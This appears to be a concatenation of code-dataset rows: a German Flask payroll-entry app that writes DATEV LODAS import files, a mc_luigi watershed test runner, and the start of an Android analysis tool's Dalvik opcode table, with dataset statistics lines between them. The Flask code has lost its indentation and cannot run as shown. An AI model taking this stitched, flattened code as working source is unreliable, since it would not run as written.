return render_template('personalstammdaten.html', v_bnr=var_beraternummer, v_mdt=var_mandantenummer, v_monat=var_abrmonat, v_jahr=var_abrjahr)
@app.route('/basisdaten.html', methods=['POST', 'GET'])
def basisdaten():
##############################################################
### Anlage der Stammdaten (Konfiguration) für die Erfassung
### Beraternummer, Mandant und Lohnarten mit Text = 5 für Stunden, 5 für Betrag
##############################################################
if request.method == 'POST':
fileziel=open("daten/basisdaten.txt","w")
# schreiben in Datei für Basisdaten
fileziel.write(request.form['form_berater']+"|"+request.form['form_mandant']+"|")
if (request.form['loa_ns1'] != "" and request.form['loa_ts1'] != "") and (request.form['loa_ns1'] != "Nummer") :
fileziel.write(request.form['loa_ns1']+"|"+request.form['loa_ts1']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_ns2'] != "" and request.form['loa_ts2'] != "") and (request.form['loa_ns2'] != "Nummer"):
fileziel.write(request.form['loa_ns2']+"|"+request.form['loa_ts2']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_ns3'] != "" and request.form['loa_ts3'] != "" ) and (request.form['loa_ns3'] != "Nummer"):
fileziel.write(request.form['loa_ns3']+"|"+request.form['loa_ts3']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_ns4'] != "" and request.form['loa_ts4'] != "") and (request.form['loa_ns4'] != "Nummer"):
fileziel.write(request.form['loa_ns4']+"|"+request.form['loa_ts4']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_ns5'] != "" and request.form['loa_ts5'] != "") and (request.form['loa_ns5'] != "Nummer"):
fileziel.write(request.form['loa_ns5']+"|"+request.form['loa_ts5']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_nb1'] != "" and request.form['loa_tb1'] != "") and (request.form['loa_nb1'] != "Nummer"):
fileziel.write(request.form['loa_nb1']+"|"+request.form['loa_tb1']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_nb2'] != "" and request.form['loa_tb2'] != "") and (request.form['loa_nb2'] != "Nummer"):
fileziel.write(request.form['loa_nb2']+"|"+request.form['loa_tb2']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_nb3'] != "" and request.form['loa_tb3'] != "") and (request.form['loa_nb3'] != "Nummer"):
fileziel.write(request.form['loa_nb3']+"|"+request.form['loa_tb3']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_nb4'] != "" and request.form['loa_tb4'] != "") and (request.form['loa_nb4'] != "Nummer"):
fileziel.write(request.form['loa_nb4']+"|"+request.form['loa_tb4']+"|")
else:
fileziel.write("nicht|buchen|")
if (request.form['loa_nb5'] != "" and request.form['loa_tb5'] != "") and (request.form['loa_nb5'] != "Nummer"):
fileziel.write(request.form['loa_nb5']+"|"+request.form['loa_tb5'])
else:
fileziel.write("nicht|buchen")
fileziel.close()
else:
pass
return render_template('basisdaten.html')
###############################################
#### Stundenerfassung und Anlage der Daten ####
@app.route('/erfassungstunden.html', methods=['POST', 'GET'])
def stundenerfassung():
## stammdaten lesen - qualitätssicherung fehlt noch
if os.path.exists("daten/basisdaten.txt"):
filequelle=open("daten/basisdaten.txt","r")
for x in filequelle:
var_beraternummer,var_mandantenummer,var_3,var_4,var_5,var_6,var_7,var_8,var_9,var_10,var_11,var_12,var_13,var_14,var_15,var_16,var_17,var_18,var_19,var_20,var_21,var_22=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Konfiguration ist nicht vorhanden! "
return render_template('index.html', v_text=var_text)
# return render_template('basisdaten.html')
if os.path.exists("daten/abrechnungszeitraum.txt"):
filequelle=open("daten/abrechnungszeitraum.txt","r", encoding='utf-8')
for x in filequelle:
var_abrmonat,var_abrjahr=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Du hast noch keinen Abrechnungszeitraum angelegt!"
return render_template('index.html', v_text=var_text)
if request.method == 'POST':
if os.path.exists("daten/abrechnungsdaten.txt"):
## Datei öffnen und Daten werden angehangen
fileziel=open("daten/abrechnungsdaten.txt","a")
fileziel.write("\n* Stunden zur Abrechnung von Mitarbeitern\n")
fileziel.write("[Bewegungsdaten]\n")
else:
## Datei neu öffnen und Kopfdaten schreiben
fileziel=open("daten/abrechnungsdaten.txt","w")
# schreiben in Lodas Importdatei
fileziel.write("[Allgemein]\nZiel=LODAS\nVersion_SST=1.0\nBeraterNr=")
fileziel.write(var_beraternummer)
fileziel.write("\nMandantenNr=")
fileziel.write(var_mandantenummer)
fileziel.write("\nDatumsformat=JJJJ-MM-TT")
# Test Datum so wie von Bootstrap komm
# t
fileziel.write("\nStringbegrenzer='")
fileziel.write("\n\n* LEGENDE:\n* Datei erzeugt mit Tool pbd2lodas\n* AP: Andreé Rosenkranz; andree@rosenkranz.one\n\n")
fileziel.write("* Satzbeschreibungen zur Übergabe von Bewegungsdaten für Mitarbeiter\n[Satzbeschreibung]\n")
fileziel.write("\n10;u_lod_bwd_buchung_standard;abrechnung_zeitraum#bwd;pnr#bwd;la_eigene#bwd;bs_nr#bwd;bs_wert_butab#bwd;kostenstelle#bwd;")
fileziel.write("\n20;u_lod_psd_beschaeftigung;pnr#psd;eintrittdatum#psd;austrittdatum#psd;arbeitsverhaeltnis#psd;schriftl_befristung#psd;datum_urspr_befr#psd;abschl_befr_arbvertr#psd;verl_befr_arbvertr#psd;befr_gr_2_monate#psd;")
fileziel.write("\n21;u_lod_psd_mitarbeiter;pnr#psd;duevo_familienname#psd;duevo_vorname#psd;adresse_strassenname#psd;adresse_strasse_nr#psd;adresse_ort#psd;adresse_plz#psd;staatsangehoerigkeit#psd;geburtsdatum_ttmmjj#psd;geschlecht#psd;familienstand#psd;sozialversicherung_nr#psd;adresse_anschriftenzusatz#psd;gebort#psd;")
fileziel.write("\n22;u_lod_psd_taetigkeit;pnr#psd;berufsbezeichnung#psd;persgrs#psd;schulabschluss#psd;ausbildungsabschluss#psd;stammkostenstelle#psd;")
fileziel.write("\n23;u_lod_psd_arbeitszeit_regelm;pnr#psd;az_wtl_indiv#psd;")
fileziel.write("\n24;u_lod_psd_steuer;pnr#psd;identifikationsnummer#psd;els_2_haupt_ag_kz#psd;st_klasse#psd;kfb_anzahl#psd;faktor#psd;")
fileziel.write("\n25;u_lod_psd_sozialversicherung;pnr#psd;kz_zuschl_pv_kinderlose#psd;kv_bgrs#psd;rv_bgrs#psd;av_bgrs#psd;pv_bgrs#psd;")
fileziel.write("\n26;u_lod_psd_ma_bank;pnr#psd;ma_bank_zahlungsart#psd;ma_iban#psd;")
fileziel.write("\n27;u_lod_psd_festbezuege;pnr#psd;festbez_id#psd;lohnart_nr#psd;betrag#psd;")
fileziel.write("\n28;u_lod_psd_lohn_gehalt_bezuege;pnr#psd;std_lohn_1#psd;")
fileziel.write("\n\n")
fileziel.write("* Stunden zur Abrechnung von Mitarbeitern\n\n")
fileziel.write("[Bewegungsdaten]\n\n")
if request.form['form_personalnummer'] == "" or request.form['form_wert'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_3+";1;"+request.form['form_wert']+";"+request.form['form_kostenstelle']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw2'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_5+";1;"+request.form['fw2']+";"+request.form['fk2']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw3'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_7+";1;"+request.form['fw3']+";"+request.form['fk3']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw4'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_9+";1;"+request.form['fw4']+";"+request.form['fk4']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw5'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_11+";1;"+request.form['fw5']+";"+request.form['fk5']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl6'] == "" or request.form['fw6'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl6']+";1;"+request.form['fw6']+";"+request.form['fk6']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl7'] == "" or request.form['fw7'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl7']+";1;"+request.form['fw7']+";"+request.form['fk7']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl8'] == "" or request.form['fw8'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl8']+";1;"+request.form['fw8']+";"+request.form['fk8']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl9'] == "" or request.form['fw9'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl9']+";1;"+request.form['fw9']+";"+request.form['fk9']+";\n")
fileziel.close()
else:
pass
return render_template('erfassungstunden.html', v_bnr=var_beraternummer, v_mdt=var_mandantenummer, v_monat=var_abrmonat, v_jahr=var_abrjahr, v_sn1=var_3,v_st1=var_4,v_sn2=var_5,v_st2=var_6,
v_sn3=var_7,v_st3=var_8,v_sn4=var_9,v_st4=var_10,v_sn5=var_11,v_st5=var_12,v_bn1=var_13,v_bt1=var_14,v_bn2=var_15,v_bt2=var_16,v_bn3=var_17,v_bt3=var_18,v_bn4=var_19,v_bt4=var_20,v_bn5=var_21,
v_bt5=var_22)
@app.route('/erfassungbetrag.html', methods=['POST', 'GET'])
def betragerfassung():
if os.path.exists("daten/basisdaten.txt"):
filequelle=open("daten/basisdaten.txt","r")
for x in filequelle:
var_beraternummer,var_mandantenummer,var_3,var_4,var_5,var_6,var_7,var_8,var_9,var_10,var_11,var_12,var_13,var_14,var_15,var_16,var_17,var_18,var_19,var_20,var_21,var_22=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Konfiguration ist nicht vorhanden! "
return render_template('index.html', v_text=var_text)
# return render_template('basisdaten.html')
if os.path.exists("daten/abrechnungszeitraum.txt"):
filequelle=open("daten/abrechnungszeitraum.txt","r", encoding='utf-8')
for x in filequelle:
var_abrmonat,var_abrjahr=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Du hast noch keinen Abrechnungszeitraum angelegt!"
return render_template('index.html', v_text=var_text)
if request.method == 'POST':
## stammdaten lesen - qualitätssicherung fehlt noch
if os.path.exists("daten/abrechnungsdaten.txt"):
## Datei öffnen und Daten werden angehangen
fileziel=open("daten/abrechnungsdaten.txt","a")
fileziel.write("\n* Beträge zur Abrechnung von Mitarbeitern\n")
fileziel.write("[Bewegungsdaten]\n\n")
else:
## Datei neu öffnen und Kopfdaten schreiben
fileziel=open("daten/abrechnungsdaten.txt","w")
# schreiben in Lodas Importdatei
fileziel.write("[Allgemein]\nZiel=LODAS\nVersion_SST=1.0\nBeraterNr=")
fileziel.write(var_beraternummer)
fileziel.write("\nMandantenNr=")
fileziel.write(var_mandantenummer)
fileziel.write("\nDatumsformat=JJJJ-MM-TT")
# Test Datum so wie von Bootstrap komm
# t
fileziel.write("\nStringbegrenzer='")
fileziel.write("\n\n* LEGENDE:\n* Datei erzeugt mit Tool pbd2lodas\n* AP: Andreé Rosenkranz; andree@rosenkranz.one\n\n")
fileziel.write("* Satzbeschreibungen zur Übergabe von Bewegungsdaten für Mitarbeiter\n[Satzbeschreibung]\n")
fileziel.write("\n10;u_lod_bwd_buchung_standard;abrechnung_zeitraum#bwd;pnr#bwd;la_eigene#bwd;bs_nr#bwd;bs_wert_butab#bwd;kostenstelle#bwd;")
fileziel.write("\n20;u_lod_psd_beschaeftigung;pnr#psd;eintrittdatum#psd;austrittdatum#psd;arbeitsverhaeltnis#psd;schriftl_befristung#psd;datum_urspr_befr#psd;abschl_befr_arbvertr#psd;verl_befr_arbvertr#psd;befr_gr_2_monate#psd;")
fileziel.write("\n21;u_lod_psd_mitarbeiter;pnr#psd;duevo_familienname#psd;duevo_vorname#psd;adresse_strassenname#psd;adresse_strasse_nr#psd;adresse_ort#psd;adresse_plz#psd;staatsangehoerigkeit#psd;geburtsdatum_ttmmjj#psd;geschlecht#psd;familienstand#psd;sozialversicherung_nr#psd;adresse_anschriftenzusatz#psd;gebort#psd;")
fileziel.write("\n22;u_lod_psd_taetigkeit;pnr#psd;berufsbezeichnung#psd;persgrs#psd;schulabschluss#psd;ausbildungsabschluss#psd;stammkostenstelle#psd;")
fileziel.write("\n23;u_lod_psd_arbeitszeit_regelm;pnr#psd;az_wtl_indiv#psd;")
fileziel.write("\n24;u_lod_psd_steuer;pnr#psd;identifikationsnummer#psd;els_2_haupt_ag_kz#psd;st_klasse#psd;kfb_anzahl#psd;faktor#psd;")
fileziel.write("\n25;u_lod_psd_sozialversicherung;pnr#psd;kz_zuschl_pv_kinderlose#psd;kv_bgrs#psd;rv_bgrs#psd;av_bgrs#psd;pv_bgrs#psd;")
fileziel.write("\n26;u_lod_psd_ma_bank;pnr#psd;ma_bank_zahlungsart#psd;ma_iban#psd;")
fileziel.write("\n27;u_lod_psd_festbezuege;pnr#psd;festbez_id#psd;lohnart_nr#psd;betrag#psd;")
fileziel.write("\n28;u_lod_psd_lohn_gehalt_bezuege;pnr#psd;std_lohn_1#psd;")
fileziel.write("\n\n")
fileziel.write("* Stunden und Beträge zur Abrechnung von Mitarbeitern\n\n")
fileziel.write("[Bewegungsdaten]\n\n")
if request.form['form_personalnummer'] == "" or request.form['form_wert'] == "":
pass # Pflichtfeld im Frontend print("Fehler im backend - kann aber nicht sein!")
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_13+";2;"+request.form['form_wert']+";"+request.form['form_kostenstelle']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw2'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_15+";2;"+request.form['fw2']+";"+request.form['fk2']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw3'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_17+";2;"+request.form['fw3']+";"+request.form['fk3']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw4'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_19+";2;"+request.form['fw4']+";"+request.form['fk4']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw5'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_21+";2;"+request.form['fw5']+";"+request.form['fk5']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl6'] == "" or request.form['fw6'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl6']+";2;"+request.form['fw6']+";"+request.form['fk6']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl7'] == "" or request.form['fw7'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl7']+";2;"+request.form['fw7']+";"+request.form['fk7']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl8'] == "" or request.form['fw8'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl8']+";2;"+request.form['fw8']+";"+request.form['fk8']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl9'] == "" or request.form['fw9'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl9']+";2;"+request.form['fw9']+";"+request.form['fk9']+";\n")
fileziel.close()
else:
pass
return render_template('erfassungbetrag.html', v_bnr=var_beraternummer, v_mdt=var_mandantenummer, v_monat=var_abrmonat, v_jahr=var_abrjahr,v_sn1=var_3,v_st1=var_4,v_sn2=var_5,v_st2=var_6,
v_sn3=var_7,v_st3=var_8,v_sn4=var_9,v_st4=var_10,v_sn5=var_11,v_st5=var_12,v_bn1=var_13,v_bt1=var_14,v_bn2=var_15,v_bt2=var_16,v_bn3=var_17,v_bt3=var_18,v_bn4=var_19,v_bt4=var_20,v_bn5=var_21,
v_bt5=var_22)
@app.route('/konvertierung.html', methods=['POST', 'GET'])
def konvert():
if os.path.exists("daten/basisdaten.txt"):
filequelle=open("daten/basisdaten.txt","r")
for x in filequelle:
var_beraternummer,var_mandantenummer,var_3,var_4,var_5,var_6,var_7,var_8,var_9,var_10,var_11,var_12,var_13,var_14,var_15,var_16,var_17,var_18,var_19,var_20,var_21,var_22=x.split("|")
break
filequelle.close()
else:
var_text=("Fehler: ** Es kann keine Lodas Datei erstellt werden ** Konfiguration nicht vorhanden! ****")
return render_template('index.html', v_text=var_text)
if os.path.exists("daten/abrechnungszeitraum.txt"):
filequelle=open("daten/abrechnungszeitraum.txt","r", encoding='utf-8')
for x in filequelle:
var_abrmonat,var_abrjahr=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: ** Es kann keine Lodas Datei erstellt werden ** Du hast noch keinen Abrechnungszeitraum angelegt! ****"
return render_template('index.html', v_text=var_text)
if os.path.exists("daten/abrechnungsdaten.txt"):
copyfile('daten/abrechnungsdaten.txt', 'daten/'+var_abrjahr+var_abrmonat+'_'+var_mandantenummer+'_'+var_beraternummer+'_lodas.txt')
os.remove('daten/abrechnungszeitraum.txt')
os.remove('daten/abrechnungsdaten.txt')
var_text="Die Datei "+var_abrjahr+var_abrmonat+"_"+var_mandantenummer+"_"+var_beraternummer+"_lodas.txt wurde im Verzeichniss /daten erstellt. Stelle diese Datei deinem Steuerberater zur Verfügung"
else:
var_text="Fehler: **** Es gibt keine Datei mit Abrechnungsdaten, es konnte keine Datei konvertiert werden. ****"
return render_template('index.html', v_text=var_text)
webbrowser.open('http://'+setting.Flask_Server_Name)
if __name__ =='__main__':
app.run(port=1701, debug=False) | 62.843462 | 426 | 0.638847 | 4,221 | 34,124 | 4.953566 | 0.114665 | 0.126788 | 0.091109 | 0.070735 | 0.801425 | 0.782821 | 0.761921 | 0.742503 | 0.72849 | 0.702186 | 0 | 0.024907 | 0.192885 | 34,124 | 543 | 427 | 62.843462 | 0.73426 | 0.058493 | 0 | 0.683857 | 0 | 0.056054 | 0.360781 | 0.175124 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022422 | false | 0.06278 | 0.015695 | 0 | 0.08296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
50e3fe271d4189488d2291572950fa87f051783e | 2,319 | py | Python | tests/unit_tests/executables/watershed.py | constantinpape/mc_luigi | c8dac84ace7d422f7ec25d722204b25d625c84e1 | [
"MIT"
] | null | null | null | tests/unit_tests/executables/watershed.py | constantinpape/mc_luigi | c8dac84ace7d422f7ec25d722204b25d625c84e1 | [
"MIT"
] | null | null | null | tests/unit_tests/executables/watershed.py | constantinpape/mc_luigi | c8dac84ace7d422f7ec25d722204b25d625c84e1 | [
"MIT"
] | null | null | null | import sys
import luigi
from mc_luigi import PipelineParameter
from mc_luigi import WsdtSegmentation
def wsdt_default():
ppl_parameter = PipelineParameter()
ppl_parameter.useN5Backend = True
ppl_parameter.read_input_file('./inputs.json')
ppl_parameter.nThreads = 8
ppl_parameter.wsdtInvert = True
inp = ppl_parameter.inputs['data'][1]
luigi.run(["--local-scheduler",
"--pathToProbabilities", inp,
"--keyToProbabilities", "data"],
WsdtSegmentation)
def wsdt_nominseg():
ppl_parameter = PipelineParameter()
ppl_parameter.useN5Backend = True
ppl_parameter.read_input_file('./inputs.json')
ppl_parameter.wsdtMinSeg = 0
ppl_parameter.nThreads = 8
ppl_parameter.wsdtInvert = True
inp = ppl_parameter.inputs['data'][1]
luigi.run(["--local-scheduler",
"--pathToProbabilities", inp,
"--keyToProbabilities", "data"],
WsdtSegmentation)
def wsdt_masked():
ppl_parameter = PipelineParameter()
ppl_parameter.useN5Backend = True
ppl_parameter.read_input_file('./inputs.json')
inp = ppl_parameter.inputs['data'][1]
ppl_parameter.nThreads = 8
ppl_parameter.wsdtInvert = True
mask = ppl_parameter.inputs['mask']
luigi.run(["--local-scheduler",
"--pathToProbabilities", inp,
"--keyToProbabilities", "data",
"--pathToMask", mask],
WsdtSegmentation)
def wsdt_masked_nominseg():
ppl_parameter = PipelineParameter()
ppl_parameter.useN5Backend = True
ppl_parameter.read_input_file('./inputs.json')
inp = ppl_parameter.inputs['data'][1]
ppl_parameter.wsdtMinSeg = 0
ppl_parameter.nThreads = 8
ppl_parameter.wsdtInvert = True
mask = ppl_parameter.inputs['mask']
luigi.run(["--local-scheduler",
"--pathToProbabilities", inp,
"--keyToProbabilities", "data",
"--pathToMask", mask],
WsdtSegmentation)
if __name__ == '__main__':
test = sys.argv[1]
if test == 'default':
wsdt_default()
elif test == 'nominseg':
wsdt_nominseg()
elif test == 'masked':
wsdt_masked()
elif test == 'masked_nominseg':
wsdt_masked_nominseg()
else:
assert False
| 28.280488 | 50 | 0.635619 | 229 | 2,319 | 6.187773 | 0.196507 | 0.237121 | 0.076217 | 0.090332 | 0.807339 | 0.807339 | 0.807339 | 0.807339 | 0.807339 | 0.807339 | 0 | 0.008562 | 0.244502 | 2,319 | 81 | 51 | 28.62963 | 0.800228 | 0 | 0 | 0.69697 | 0 | 0 | 0.169038 | 0.036223 | 0 | 0 | 0 | 0 | 0.015152 | 1 | 0.060606 | false | 0 | 0.060606 | 0 | 0.121212 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
50ebb3ba67506a5d42de3f8733c9cccf1e94ac5b | 20,848 | py | Python | ares/core/constants.py | DarioI/DroidSec | 9c4c0273e8bc92264af0b6464e810cffc6f0ce39 | [
"Apache-2.0"
] | 6 | 2015-06-22T18:27:31.000Z | 2015-08-10T01:30:15.000Z | ares/core/constants.py | DarioI/DroidSec | 9c4c0273e8bc92264af0b6464e810cffc6f0ce39 | [
"Apache-2.0"
] | 1 | 2015-08-10T09:54:28.000Z | 2015-08-10T09:54:28.000Z | ares/core/constants.py | DarioI/DroidSec | 9c4c0273e8bc92264af0b6464e810cffc6f0ce39 | [
"Apache-2.0"
] | null | null | null | # This file is part of ARES.
#
# Copyright (C) 2015, Dario Incalza <dario.incalza at gmail.com>
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'Dario Incalza <dario.incalza@gmail.com>'
TAINTED_PACKAGE_CREATE = 0
TAINTED_PACKAGE_CALL = 1
TAINTED_PACKAGE = {
TAINTED_PACKAGE_CREATE : "C",
TAINTED_PACKAGE_CALL : "M"
}
DEX_BYTECODE_SET = {
"nop": "Waste cycles.",
"move": "Move the contents of one non-object register to another.",
"move-wide": "Move the contents of one register-pair to another.\nNote: It is legal to move from vN to either vN-1 or vN+1, so implementations must arrange for both halves of a register pair to be read before anything is written.",
"move-object": "Move the contents of one object-bearing register to another.",
"move-result": "Move the single-word non-object result of the most recent invoke-kind into the indicated register. This must be done as the instruction immediately after an invoke-kind whose (single-word, non-object) result is not to be ignored; anywhere else is invalid.",
"move-result-wide": "Move the double-word result of the most recent invoke-kind into the indicated register pair. This must be done as the instruction immediately after an invoke-kind whose (double-word) result is not to be ignored; anywhere else is invalid.",
"move-result-object": "Move the object result of the most recent invoke-kind into the indicated register. This must be done as the instruction immediately after an invoke-kind or filled-new-array whose (object) result is not to be ignored; anywhere else is invalid.",
"move-exception": "Save a just-caught exception into the given register. This must be the first instruction of any exception handler whose caught exception is not to be ignored, and this instruction must only ever occur as the first instruction of an exception handler; anywhere else is invalid.",
"return-void": "Return from a void method.",
"return": "Return from a single-width (32-bit) non-object value-returning method.",
"return-wide": "Return from a double-width (64-bit) value-returning method.",
"return-object": "Return from an object-returning method.",
"const": "Move the given literal value (sign-extended to 32 bits) into the specified register.",
"const-wide": "Move the given literal value (sign-extended to 64 bits) into the specified register-pair.",
"const-string": "Move a reference to the string specified by the given index into the specified register.",
"const-class": "Move a reference to the class specified by the given index into the specified register. In the case where the indicated type is primitive, this will store a reference to the primitive type's degenerate class.",
"monitor-enter": "Acquire the monitor for the indicated object.",
"monitor-exit": "Release the monitor for the indicated object.\nNote: If this instruction needs to throw an exception, it must do so as if the pc has already advanced past the instruction. It may be useful to think of this as the instruction successfully executing (in a sense), and the exception getting thrown after the instruction but before the next one gets a chance to run. This definition makes it possible for a method to use a monitor cleanup catch-all (e.g., finally) block as the monitor cleanup for that block itself, as a way to handle the arbitrary exceptions that might get thrown due to the historical implementation of Thread.stop(), while still managing to have proper monitor hygiene.",
"check-cast": "Throw a ClassCastException if the reference in the given register cannot be cast to the indicated type.",
"instance-of": "Store in the given destination register 1 if the indicated reference is an instance of the given type, or 0 if not.",
"array-length": "Store in the given destination register the length of the indicated array, in entries",
"new-instance": "Construct a new instance of the indicated type, storing a reference to it in the destination. The type must refer to a non-array class.",
"new-array" : "Construct a new array of the indicated type and size. The type must be an array type.",
"filled-new-array" : "Construct an array of the given type and size, filling it with the supplied contents. The type must be an array type. The array's contents must be single-word (that is, no arrays of long or double, but reference types are acceptable). The constructed instance is stored as a 'result' in the same way that the method invocation instructions store their results, so the constructed instance must be moved to a register with an immediately subsequent move-result-object instruction (if it is to be used).",
"fill-array-data" : "Fill the given array with the indicated data. The reference must be to an array of primitives, and the data table must match it in type and must contain no more elements than will fit in the array. That is, the array may be larger than the table, and if so, only the initial elements of the array are set, ",
"throw" : "Throw the indicated exception.",
"goto" : "Unconditionally jump to the indicated instruction.\nNote: The branch offset must not be 0. (A spin loop may be legally constructed either with goto/32 or by including a nop as a target before the branch.)",
"packed-switch" : "Jump to a new instruction based on the value in the given register, using a table of offsets corresponding to each value in a particular integral range, or fall through to the next instruction if there is no match.",
"sparse-switch" : "Jump to a new instruction based on the value in the given register, using an ordered table of value-offset pairs, or fall through to the next instruction if there is no match.",
"if-eq" : "Branch to the given destination if the given two registers' values compare as specified.",
"if-ne" : "Branch to the given destination if the given two registers' values compare as specified.",
"if-lt" : "Branch to the given destination if the given two registers' values compare as specified.",
"if-ge" : "Branch to the given destination if the given two registers' values compare as specified.",
"if-gt" : "Branch to the given destination if the given two registers' values compare as specified.",
"if-le" : "Branch to the given destination if the given two registers' values compare as specified.",
"if-eqz" : "Branch to the given destination if the given register's value compares with 0 as specified.",
"if-nez" : "Branch to the given destination if the given register's value compares with 0 as specified.",
"if-ltz" : "Branch to the given destination if the given register's value compares with 0 as specified.",
"if-gez" : "Branch to the given destination if the given register's value compares with 0 as specified.",
"if-gtz" : "Branch to the given destination if the given register's value compares with 0 as specified.",
"if-lez" : "Branch to the given destination if the given register's value compares with 0 as specified.",
"aget" : "Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aget-wide":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aget-object":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aget-boolean":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aget-byte":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aget-char":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aget-short":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aput":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aput-wide":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aput-object":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aput-boolean":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aput-byte":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aput-char":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aput-short":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"iget":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iget-wide":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iget-object":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iget-boolean":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
